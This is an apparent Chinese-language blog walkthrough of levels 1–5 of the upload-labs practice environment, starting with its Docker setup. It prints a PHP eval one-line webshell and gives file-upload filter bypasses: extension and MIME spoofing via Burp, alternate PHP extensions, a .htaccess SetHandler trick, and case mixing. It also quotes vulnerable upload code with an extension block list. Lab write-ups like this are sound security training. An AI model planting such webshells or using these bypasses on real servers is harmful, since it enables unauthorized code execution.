搭建upload-labs
-
docker 搭建upload-labs
我们正常搭建
docker search upload-labs
docekr pull xxx
docekr run -it --name xxx -p 80:80 --rm xxx
如果用镜像的话,最好获取新的镜像源,pull速度太慢,建议更换 -
浏览器无法加载出来正常页面
因为此前我们做过sqli-labs,所以可能环境搭好后可能会有页面缓冲,页面不是这样的。
此时我们可以这样:设置 ->隐私与安全 ->网站数据 ->清除网站数据
之后就可以加载到正常界面了
upload-labs的通关
-
第1关
-
第一关没有限制,但是提示先创建upload文件我们在docker中进入容器 用 mkdir upload即可正常进行
我们先写好一句话木马
<?php @eval($_POST['attack']) ?> 命名为webshell.php,
但是,php文件无法上传,可以断定是前端检测
我们先把他后缀名改为jpg,再用burp抓包,找到此选项,将其后缀名改为php
如图,改为后缀名php,这样我们就把木马植入进去了。
用中国菜刀看一下,好的,我们获取控制权限了。
第2关
本关先看一下源代码吧
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '文件类型不正确,请重新上传!';
}
} else {
$msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
}
和第一关差不多,我们把type改成他允许的类型。
'image/jpeg 或者 image/png’等等
继续用burp抓包
将如图所示修改即可
第3关
把php后缀ban掉了
这样我们尝试.php3(php2,3,4,5都行)或.phtml绕后
菜刀试一下,能不能,ok,成功
等等,你知道什么是php3吗?
我们在apache服务器解析中,会像这样添加配置,将php3等后缀文件解析成php文件。在我们搭建的docker环境中,他已经配置好了,所以不需要我们配置
第4关
这关,又又又ban了一堆,正好认识一个新朋友
我们先来介绍一下htaccess
.htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置
我们先创建一个以hack.htaccess为名的文件,
配置内容如下
SetHandler application/x-httpd-php
这样可以把所有的文件当php文件执行
原理
.htacess文件作为局部变量作用文件成功作用的两个条件
- Allow Override ALL
- LOadModule rewrite_moudle_moudles/mod_rewrite.so#rewrite模块为开启状态
原理测试
- 当rewrite模块开启,配置文件httpd.conf如下时,apache服务器会将所有.jpg为后缀的文件作为php文件解析。
<Directory />
Options FollowSymLinks
AllowOverride All
AddType application/x-httpd-php .jpg #将.jpg后缀的文件作为PHP文件解析
</Directory>
# AddType allows you to add to or override the MIME configuration
# file mime.types for specific file types.
#
#AddType application/x-tar .tgz
当我们上传.htaccess文件到upload目录时,upload目录下的文件会按其配置生效解析
http.conf文件配置
Directory />
Options FollowSymLinks
AllowOverride All
</Directory>
.htaccess文件中的内容可以是
AddType application/x-httpd-php .jpg
但是好几次这样没有起到效果,同时,apache会将所有的.jpg后缀的文件当作php文件解析,这样会明显影响系统的功能,,改进代码如下,这样系统就只对文件名包含“info.png”字符串的文件进行解析,例如aaainfo.png,aaainfo.pngxsdf,aaainfo.png.txt。
<FilesMatch "info.png">
setHandler application/x-httpd-php
</FilesMatch>
改进之后
<FilesMatch "^info.png$">
setHandler application/x-httpd-php
</FilesMatch>
接上文
然后用burp抓包,把前缀删掉,只留下.htaccess,把这个传上去之后,在上传我们的webshell,jpg文件,这样就能获取他的权限。
总结
最后再总结一下这个漏洞可以利用的条件
- apache服务器
- 能够上传.htaccess文件,一般为黑名单限制。
- AllowOverride All,默认配置为关闭None。
- LoadModule rewrite_module modules/mod_rewrite.so #模块为开启状态
- 上传目录具有可执行权限。
第5关
第五关把第四关的外援给ban了,但你仔细观看源代码
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
if (file_exists(UPLOAD_PATH)) {
$deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
$file_name = trim($_FILES['upload_file']['name']);
$file_name = deldot($file_name);//删除文件名末尾的点
$file_ext = strrchr($file_name, '.');
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
$file_ext = trim($file_ext); //首尾去空
if (!in_array($file_ext, $deny_ext)) {
$temp_file = $_FILES['upload_file']['tmp_name'];
$img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
if (move_uploaded_file($temp_file, $img_path)) {
$is_upload = true;
} else {
$msg = '上传出错!';
}
} else {
$msg = '此文件类型不允许上传!';
}
} else {
$msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
}
}
没错,他不像前几关一样,会把输入的大小写全部转化为小写,我们采用sqli-labs用过的大小写,混合注入。更改为webshell.Php,这样,顺利注入。
后续会不久后补齐,希望大家支持一下。(小白一个,欢迎指正)
扫一扫
886
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
